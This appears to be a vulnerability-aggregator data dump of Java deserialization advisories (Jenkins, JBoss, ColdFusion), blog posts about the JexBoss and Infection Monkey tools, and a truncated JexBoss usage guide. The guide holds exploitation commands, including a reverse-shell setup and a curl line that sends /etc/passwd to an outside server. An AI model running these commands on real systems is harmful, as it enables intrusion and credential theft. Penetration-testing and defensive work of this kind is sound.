png)\n\nAs shown in the figure above, the defaultBeanProcessing method is eventually called by the equals method of the ConcurrentSkipListSet class. Many people might ask here: with so many call relationships, why look only at this class's equals method? Some experience is involved here, because a great many things are associated with the equals method. For some data structures in Java, such as a Set, each time an element is added the structure checks whether the current key is already present, and comparing whether two objects are equal calls the hashcode and equals methods. Readers who have studied other deserialization vulnerabilities may find this somewhat familiar, for example from the trigger process of the JDK deserialization. If you do not have this experience, you can only search one by one.\n\n**[1] [[2]](<83274_2.htm>) [[3]](<83274_3.htm>) [[4]](<83274_4.htm>) [next](<83274_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-04T00:00:00", "type": "myhack58", "title": "Jenkins-LDAP (CVE-2016-9299) deserialization vulnerability analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-02-04T00:00:00", "id": "MYHACK58:62201783274", "href": "http://www.myhack58.com/Article/html/3/62/2017/83274.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:32:33", "description": "An invocation layer deserialization vulnerability exists in Red Hat JBoss Seam Framework. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted file to the web application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-13T00:00:00", "type": "checkpoint_advisories", "title": "JbossMQ Invocation Layer Deserialization Remote Code Execution (CVE-2017-12149; CVE-2017-7504)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2017-7504"], "modified": "2017-12-13T00:00:00", "id": "CPAI-2017-1066", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:31:59", "description": "An insecure deserialization vulnerability exists in the Flex 
integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation by the DataServicesCFProxy. A successful attack could lead to a remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-27T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion DataServicesCFProxy Insecure Deserialization (CVE-2017-11283)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11283"], "modified": "2018-01-03T00:00:00", "id": "CPAI-2017-1019", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:27:24", "description": "A vulnerability exists in Adobe ColdFusion. 
Successful exploitation of this vulnerability could allow a remote attacker to damage a user's system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-15T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion Insecure Deserialization - Ver2 (CVE-2017-11284)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11284"], "modified": "2018-07-31T00:00:00", "id": "CPAI-2018-0799", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:32:08", "description": "An insecure deserialization vulnerability exists in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation on objects in the RMI Registry before deserializing them. 
A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted serialized data to the target application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-10-29T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion RMI Registry Insecure Deserialization (CVE-2017-11284)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11284"], "modified": "2017-11-21T00:00:00", "id": "CPAI-2017-0884", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T22:27:51", "description": "A command injection vulnerability exists in Jenkins. The vulnerability is due to lack of serialized object validation. 
Successful exploitation could allow an attacker to execute arbitrary code in the target machine.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-15T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins CI Unauthenticated Remote Code Execution (CVE-2017-1000353)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2018-02-15T00:00:00", "id": "CPAI-2018-0130", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:29:05", "description": "A Remote Code Execution vulnerability exists within Red Hat Jboss application server. This is due to the way the Jboss Application Server handles its Read Only Access filter. 
A successful attacker could run arbitrary code on the machine.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-07T00:00:00", "type": "checkpoint_advisories", "title": "Red Hat Jboss Application Server Remote Code Execution (CVE-2017-12149)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2018-05-30T00:00:00", "id": "CPAI-2018-0013", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:45:13", "description": "An insecure deserialization vulnerability has been reported in Jenkins CI Server. 
This vulnerability is due to deserialization of untrusted data while having the vulnerable version of Apache Commons-Collections library in the code path.", "cvss3": {}, "published": "2015-12-21T00:00:00", "type": "checkpoint_advisories", "title": "Jenkins CI Server Commons-Collections Library Insecure Deserialization (CVE-2015-8103)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2017-02-20T00:00:00", "id": "CPAI-2015-1419", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "pentestit": [{"lastseen": "2017-08-11T08:07:48", "description": "PenTestIT RSS Feed\n\nI was working with a customer's Red Hat JBoss server today and wanted to test for affected deserialization vulnerabilities. Though my favourite go-to tool, the Burp Suite, has many extensions, I wanted to try something that I had not before. That's when I stumbled across **JexBoss**, which turned out to be a pretty decent [open source](<http://pentestit.com/tag/open-source/>) tool. I think _JexBoss_ is a play on the words Java EXploitation like a Boss.\n\n\n\n## What is JexBoss?\n\nJexBoss is an open source tool in Python to help you exploit and verify Java and Red Hat JBoss deserialization vulnerabilities. As we all know, serialization converts an object's state to a byte stream so that a copy of the same object can be obtained by reverting the byte stream itself. Presumably, to deserialize is to reverse serialization, i.e. taking the serialized data to rebuild it into the original object. 
This problem is trivial in Java as there are no checks on the classes that can be deserialized.\n\n## Features of JexBoss:\n\nThe tool and exploits were developed and tested for:\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), DNS gadget, Remote JMX (CVE-2016-3427, CVE-2016-8735), Apache Struts2 Jakarta Multipart parser CVE-2017-5638, etc.)\n * Supported exploitation vectors are: \n * /_admin-console_: Tested and working in JBoss versions 5 and 6.\n * /_jmx-console_: Tested and working in JBoss versions 4, 5 and 6.\n * /_jmx-console_/_HtmlAdaptor_: Tested and working in JBoss versions 4, 5 and 6.\n * /_web-console_/_Invoker_: Tested and working in JBoss versions 4, 5 and 6.\n * /_invoker_/_JMXInvokerServlet_: Tested and working in JBoss versions 4, 5 and 6.\n * Application Deserialization: Tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters.\n * Servlet Deserialization: Tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects.\n * Apache Struts2 Jakarta Multipart ([CVE-2017-5638](<http://pentestit.com/tag/CVE-2017-5638/>)): Tested against Apache Struts 2 applications.\n * Tries to authenticate to /_admin-console_/_login.seam_ using default user name and password - admin:admin.\n * Sends exploits with proper headers alternating with random User-Agent string.\n * Proxy support.\n * Auto scan and file scan modes.\n\nWith the auto scan and file scan modes, you can leverage this tool to launch a mass-scan against your own network in a short duration of time. Additionally, a payload also allows you to gain access to a reverse shell with Metasploit meterpreter support. More good news is that JexBoss is Python 2 & Python 3 compatible. 
It also includes an auto-updater.\n\n## Download JexBoss:\n\nAs always, the current version - JexBoss version 1.2.4 - can be obtained by checking out the GIT repository from [**here**](<https://github.com/joaomatosf/jexboss>).\n\nThe post [JexBoss: Java Deserialization Verification & EXploitation Tool!](<http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2017-08-11T06:52:45", "title": "JexBoss: Java Deserialization Verification & EXploitation Tool!", "type": "pentestit", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-08-11T06:52:45", "id": "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "href": "http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-03T23:18:27", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post titled the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned the Guardicore Infection Monkey. The good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n## What is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. 
It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. 
The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. 
In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE-2015-1427) & the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLots of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-12-03T22:28:53", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2023-06-23T15:18:52", "description": "JexBoss is a tool for testing and exploiting [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and other Java Platforms, Frameworks, Applications, etc. 
\n \n**Requirements** \n\n\n * Python >= 2.7.x\n * [urllib3](<https://pypi.python.org/pypi/urllib3>)\n * [ipaddress](<https://pypi.python.org/pypi/ipaddress>)\n \n**Installation on Linux\\Mac** \nTo install the latest version of JexBoss, please use the following commands: \n\n \n \n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n OR:\n \n Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n unzip master.zip\n cd jexboss-master\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n\nIf you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: \n\n \n \n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\n \n**Installation on Windows** \nIf you are using Windows, you can use the [Git Bash](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. 
Follow the steps below: \n\n\n * Download and install [Python](<https://www.python.org/downloads/release/python-2712/>)\n * Download and install [Git for Windows](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>)\n * After installing, run the Git for Windows and type the following commands:\n \n \n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n\n \n**Features** \nThe tool and [exploits](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: \n\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)\nThe exploitation vectors are: \n\n\n * /admin-console\n * tested and working in JBoss versions 5 and 6\n * /jmx-console\n * tested and working in JBoss versions 4, 5 and 6\n * /web-console/Invoker\n * tested and working in JBoss versions 4, 5 and 6\n * /invoker/JMXInvokerServlet\n * tested and working in JBoss versions 4, 5 and 6\n * Application Deserialization\n * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters\n * Servlet Deserialization\n * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. 
when you see an \"Invoker\" in a link)\n * Apache Struts2 CVE-2017-5638\n * tested in [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications\n * Others\n \n**Videos** \n\n\n * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss\n\n \n\n\n * Exploiting JBoss Application Server with JexBoss\n\n \n\n\n * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)\n\n \n \n**Screenshots** \n\n\n * Simple usage examples:\n \n \n $ python jexboss.py\n\n \n\n\n[](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>)\n\n \n\n\n * Example of standalone mode against JBoss:\n \n \n $ python jexboss.py -u http://192.168.0.26:8080\n\n \n\n\n[](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>)\n\n * Usage modes:\n \n \n $ python jexboss.py -h\n\n * Network scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>)\n\n \n\n\n * Network scan with auto-exploit mode:\n \n \n $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>)\n\n \n\n\n * Results and recommendations:\n\n[](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>)\n\n \n 
 \n**Reverse Shell (meterpreter integration)** \nAfter you exploit a JBoss server, you can use [jexboss](<https://www.kitploit.com/search/label/JexBoss>)'s own command shell or perform a reverse connection using the following command: \n\n \n \n jexremote=YOUR_IP:YOUR_PORT\n \n Example:\n Shell>jexremote=192.168.0.10:4444\n\n \n\n\nWhen exploiting Java deserialization [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a command to execute. \n \n**Usage examples** \n\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n\n * For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638)\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [cookies](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources\n \n \n $ python 
jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n\n * Auto scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n\n * File scan mode:\n \n \n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n\n * More Options:\n \n \n optional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n \n Standalone mode:\n -host HOST, -u HOST Host address to be checked (eg. 
-u\n http://192.168.0.10:8080)\n \n Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. -H javax.faces.ViewState or -H\n oldFormData (<- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n \n Auto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 
